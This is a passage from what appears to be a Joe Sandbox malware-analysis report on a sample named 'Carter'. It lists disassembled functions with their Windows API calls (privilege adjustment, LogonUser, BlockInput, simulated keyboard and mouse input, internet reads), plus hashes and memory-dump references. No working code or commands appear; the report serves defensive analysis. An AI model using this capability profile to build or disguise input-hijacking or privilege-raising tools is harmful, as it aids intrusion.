                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                        • String ID:
                                                                        • API String ID: 1157408455-0
                                                                        • Opcode ID: add96f0da79b76a9b9ce95c584f8290113b066c13aaa0f2d3cd0a64f7db3d2a3
                                                                        • Instruction ID: 2536db8005a2307681bb699382fb627dfa0f783028d5034f5aa349ba80e9e7e8
                                                                        • Opcode Fuzzy Hash: add96f0da79b76a9b9ce95c584f8290113b066c13aaa0f2d3cd0a64f7db3d2a3
                                                                        • Instruction Fuzzy Hash: C011AEB5D012287AE7309665AC4DFEBBB7CEF45760F0046D6F544E7180D6744E8087A4
                                                                        Function 010529BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,01051ED6,00000000), ref: 01052AAD
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 01052AE4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: 6498fbd5c8b682982cf82c89ad40256cfefe105f0a244c979485f503a80467f1
                                                                        • Instruction ID: 648a916724a8e66e8bea6fee9a88845077161ff3a6f50fa5fe2d743236afb270
                                                                        • Opcode Fuzzy Hash: 6498fbd5c8b682982cf82c89ad40256cfefe105f0a244c979485f503a80467f1
                                                                        • Instruction Fuzzy Hash: 9B419471A0420AFFFBA1DE58CC84EBFB7FCEF40754F00405AFA85A6185DA719E419A60
                                                                        Function 01039399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 010393E3
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01039410
                                                                        • GetLastError.KERNEL32 ref: 0103941D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: 5bf6b58ae679bc1f8f884a949af92ffe4f82ce716feca695b61f2cced0cfb626
                                                                        • Instruction ID: 8313828b08789631d1820acc0f346cc8f9cf856bfcb058e6334d1827e57ee03c
                                                                        • Opcode Fuzzy Hash: 5bf6b58ae679bc1f8f884a949af92ffe4f82ce716feca695b61f2cced0cfb626
                                                                        • Instruction Fuzzy Hash: 141191B1814205AFE728DF54DC85D6BB7FCFB44764B10852EF49A93684EB71AC41CB60
                                                                        Function 01044F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 01044F45
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01044F5C
                                                                        • FreeSid.ADVAPI32(?), ref: 01044F6C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: 6cfdf3e7c908a7b91c87aa9c34659455a14fbdc2b0c7e4e81391cfd2b3256ca9
                                                                        • Instruction ID: 37e796a2c4670a98d91a521b4389d679a97c58961e1e98a0fe177d7c7c3474fa
                                                                        • Opcode Fuzzy Hash: 6cfdf3e7c908a7b91c87aa9c34659455a14fbdc2b0c7e4e81391cfd2b3256ca9
                                                                        • Instruction Fuzzy Hash: FCF03C75D1120CBFDB00DEE49889EADBBB8EB08211F0045A9B501E2184D6356A148B50
                                                                        Function 01041AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 01041B01
                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 01041B14
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InputSendkeybd_event
                                                                        • String ID:
                                                                        • API String ID: 3536248340-0
                                                                        • Opcode ID: e162aa69f9a7556dc01f051cf78713494dee447f01ce4310dd75739ec1b055da
                                                                        • Instruction ID: c96582013032267e3bc4e14ca066bbc191b157747fed8d0235b37d51407d9c21
                                                                        • Opcode Fuzzy Hash: e162aa69f9a7556dc01f051cf78713494dee447f01ce4310dd75739ec1b055da
                                                                        • Instruction Fuzzy Hash: A4F0497190024DABDB10CF94C805BFE7BB4FF08315F00815AF999AA292D37A9615DF94
                                                                        Function 0104A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,01059B52,?,0107098C,?), ref: 0104A6DA
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,01059B52,?,0107098C,?), ref: 0104A6EC
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFormatLastMessage
                                                                        • String ID:
                                                                        • API String ID: 3479602957-0
                                                                        • Opcode ID: fe75a923bd8f6b5177f0887afaff9dbe71b17d2a5e271522dc88778b33837983
                                                                        • Instruction ID: c45d39e17c5d5fa27a4209e102c794046a9f3d0e64d419fa57bdf5b5e6e83607
                                                                        • Opcode Fuzzy Hash: fe75a923bd8f6b5177f0887afaff9dbe71b17d2a5e271522dc88778b33837983
                                                                        • Instruction Fuzzy Hash: 9FF0823954422EFBDB21AEA4CC88FEA77ACBF09361F008265B949A7185D6759540CBA0
                                                                        Function 01038DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01038F27), ref: 01038DFE
                                                                        • CloseHandle.KERNEL32(?,?,01038F27), ref: 01038E10
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: e2c4b454bfdef00c4e274c4787b945677d14f9d673e4cc332349cf835cb859a8
                                                                        • Instruction ID: fcd0fccd7a4cc2f83ddc6c201f8eca38030a624d03b0d0149e48ddc655f296e0
                                                                        • Opcode Fuzzy Hash: e2c4b454bfdef00c4e274c4787b945677d14f9d673e4cc332349cf835cb859a8
                                                                        • Instruction Fuzzy Hash: 16E04F71000601EFF7322B60EC08DB37BADEB00310B10891DF4D5804B4C7729C90DB50
                                                                        Function 0100A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01008F87,?,?,?,00000001), ref: 0100A38A
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0100A393
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: ae837576b173107a9b43ee38f0b717633c721c25d2e7551e59d504237f930f55
                                                                        • Instruction ID: c7acc17adc0ed33ac9b8587b35a915339b855c3b13184a8e12e3c628e5facf2a
                                                                        • Opcode Fuzzy Hash: ae837576b173107a9b43ee38f0b717633c721c25d2e7551e59d504237f930f55
                                                                        • Instruction Fuzzy Hash: 68B09231474208ABCA502B91E809B8A3F6CEB46A6AF008110F64D54058CBA764508B91
                                                                        Function 010545D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • BlockInput.USER32(00000001), ref: 010545F0
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BlockInput
                                                                        • String ID:
                                                                        • API String ID: 3456056419-0
                                                                        • Opcode ID: ea17065f1bbb2139bb61ea9581f79883e57a62356d73a9d1728ed880802c03b9
                                                                        • Instruction ID: 37ddc051aeea3b900d1481b44b6b5e56be80704d0d4cecb5ce2dec3b42599712
                                                                        • Opcode Fuzzy Hash: ea17065f1bbb2139bb61ea9581f79883e57a62356d73a9d1728ed880802c03b9
                                                                        • Instruction Fuzzy Hash: ADE0D8353001055FC750EF5AD800A8BF7DCAF84760F008015FC45D7302DA74F9418B91
                                                                        Function 010451E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01045205
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: 69fc0dd539ab763b7edf1225f77387fafcffc01954f7e796062a4ac7d8f0ac0f
                                                                        • Instruction ID: 4f3bb660d6f96391a574775d88f6d3b7fe8338b67f33533a8c407732ffbefa99
                                                                        • Opcode Fuzzy Hash: 69fc0dd539ab763b7edf1225f77387fafcffc01954f7e796062a4ac7d8f0ac0f
                                                                        • Instruction Fuzzy Hash: 9AD092E616060A7BFDA807289E9FF7A1A88E3016C1F8446A9B2C2990E1ECD568859531
                                                                        Function 01039369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,01038FA7), ref: 01039389
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 0c0c820147f45c8a19a49aaf53d6942c66423951a7506b71853b77c1a53ba4a0
                                                                        • Instruction ID: 77ee0e29caa5438719b0af0a59aed2089a0a35abda9c6073998aeb4550451866
                                                                        • Opcode Fuzzy Hash: 0c0c820147f45c8a19a49aaf53d6942c66423951a7506b71853b77c1a53ba4a0
                                                                        • Instruction Fuzzy Hash: 81D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15D5090C776D835AF60
                                                                        Function 01020722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 01020734
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: NameUser
                                                                        • String ID:
                                                                        • API String ID: 2645101109-0
                                                                        • Opcode ID: cb9810eece71e0257b4d4b4e502125e860b623ad49a552ee93366595f9fced1c
                                                                        • Instruction ID: 5913a1def075ca4520a8cc46f0cfe00ad07034e2482d0dfc3b8f8f3c1770ed5e
                                                                        • Opcode Fuzzy Hash: cb9810eece71e0257b4d4b4e502125e860b623ad49a552ee93366595f9fced1c
                                                                        • Instruction Fuzzy Hash: D5C04CF180011DDBDB15DBA0D588DEE77BCAB04314F100555F145B2104D778AB448B71
                                                                        Function 0100A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0100A35A
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 703a7b80440a02ecd022dc23fbda32319b7aa7f2f87f3d0bf17326017a45c001
                                                                        • Instruction ID: ca0accb64d53d47514f96f289d155d59293c7a9bad5dca2cbe16e94eb603edde
                                                                        • Opcode Fuzzy Hash: 703a7b80440a02ecd022dc23fbda32319b7aa7f2f87f3d0bf17326017a45c001
                                                                        • Instruction Fuzzy Hash: 0DA0123002010CA78A001A41E8044457F5CD6011547008010F40C00015877364104A80
                                                                        Function 01063BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,01070980), ref: 01063C65
                                                                        • IsWindowVisible.USER32(?), ref: 01063C89
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 4105515805-45149045
                                                                        • Opcode ID: 458b61eeee9cf0be61bee82c1fd07a0a551edcd60e676460c3b97f53cb284847
                                                                        • Instruction ID: ba5c888de27c0ae12cdd1dd09e7aa6bdc8b4d91c0fce2b4fe60cd64e4be21cae
                                                                        • Opcode Fuzzy Hash: 458b61eeee9cf0be61bee82c1fd07a0a551edcd60e676460c3b97f53cb284847
                                                                        • Instruction Fuzzy Hash: 58D19330204215DBEB14EF14C950AAEBBE9FFA4354F104459F9CA5B2E6CB35ED0ACB91
                                                                        Function 0106ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0106AC55
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0106AC86
                                                                        • GetSysColor.USER32(0000000F), ref: 0106AC92
                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0106ACAC
                                                                        • SelectObject.GDI32(?,?), ref: 0106ACBB
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0106ACE6
                                                                        • GetSysColor.USER32(00000010), ref: 0106ACEE
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0106ACF5
                                                                        • FrameRect.USER32(?,?,00000000), ref: 0106AD04
                                                                        • DeleteObject.GDI32(00000000), ref: 0106AD0B
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0106AD56
                                                                        • FillRect.USER32(?,?,?), ref: 0106AD88
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0106ADB3
                                                                          • Part of subcall function 0106AF18: GetSysColor.USER32(00000012), ref: 0106AF51
                                                                          • Part of subcall function 0106AF18: SetTextColor.GDI32(?,?), ref: 0106AF55
                                                                          • Part of subcall function 0106AF18: GetSysColorBrush.USER32(0000000F), ref: 0106AF6B
                                                                          • Part of subcall function 0106AF18: GetSysColor.USER32(0000000F), ref: 0106AF76
                                                                          • Part of subcall function 0106AF18: GetSysColor.USER32(00000011), ref: 0106AF93
                                                                          • Part of subcall function 0106AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0106AFA1
                                                                          • Part of subcall function 0106AF18: SelectObject.GDI32(?,00000000), ref: 0106AFB2
                                                                          • Part of subcall function 0106AF18: SetBkColor.GDI32(?,00000000), ref: 0106AFBB
                                                                          • Part of subcall function 0106AF18: SelectObject.GDI32(?,?), ref: 0106AFC8
                                                                          • Part of subcall function 0106AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0106AFE7
                                                                          • Part of subcall function 0106AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0106AFFE
                                                                          • Part of subcall function 0106AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0106B013
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                        • String ID:
                                                                        • API String ID: 4124339563-0
                                                                        • Opcode ID: 3ad61e69568444e15d0f5a6e4b5f9ea1f0ce50819ce1dc0777228b2bf0dbf97d
                                                                        • Instruction ID: 0c72c637dec407a9fcc601d97525be5dfbda8ee85134373d86b66a02d715368a
                                                                        • Opcode Fuzzy Hash: 3ad61e69568444e15d0f5a6e4b5f9ea1f0ce50819ce1dc0777228b2bf0dbf97d
                                                                        • Instruction Fuzzy Hash: 98A18D72908301EFD761AF64DC08A6BBBE9FF89321F100B19F5A2A61D9C736D940CB51
                                                                        Function 00FE2FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?), ref: 00FE3072
                                                                        • DeleteObject.GDI32(00000000), ref: 00FE30B8
                                                                        • DeleteObject.GDI32(00000000), ref: 00FE30C3
                                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00FE30CE
                                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00FE30D9
                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0101C77C
                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0101C7B5
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0101CBDE
                                                                          • Part of subcall function 00FE1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE2412,?,00000000,?,?,?,?,00FE1AA7,00000000,?), ref: 00FE1F76
                                                                        • SendMessageW.USER32(?,00001053), ref: 0101CC1B
                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0101CC32
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0101CC48
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0101CC53
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
